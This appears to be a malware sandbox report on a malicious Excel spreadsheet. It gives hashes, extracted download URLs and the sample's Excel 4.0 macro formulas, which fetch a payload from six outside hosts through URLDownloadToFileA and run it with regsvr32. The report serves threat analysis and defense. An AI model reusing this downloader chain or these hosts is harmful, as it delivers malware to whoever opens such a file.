Static task
static1
Behavioral task
behavioral1
Sample
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30.xlsx
Resource
win10v2004-20240802-en
General
-
Target
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30
-
Size
38KB
-
MD5
6d1f1c5f427c72400803be74c7f0d5ad
-
SHA1
3157d59b9b5949dd60b81a9d1a6592813e0793ec
-
SHA256
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30
-
SHA512
fe31150d4435911a71e902fedea98d72551fd60ce329b675f4c5751453885704aba16b7ecccbc4c13140905f3cd3e82a595ae011c2e5cce5ec1a4716ee074d26
-
SSDEEP
768:nC/4614X7FEFu16j7hnyuYC+D5ozu2twUYkcABKM1+bB5lqHLAWUb5Gi:C/46qJEMUhS12twBjgUKS5Gi
Malware Config
Extracted
http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/
http://totalplaytuxtla.com/sitio/tEMOwWRh/
http://meca-global.com/wp-admin/zpM6L8KXY0H/
http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/
http://51.222.72.232/wp-includes/3ztqctcYr/
http://51.222.72.233/wp-includes/Xi60QX9khe/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()
Signatures
Files
-
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30.xlsx office2007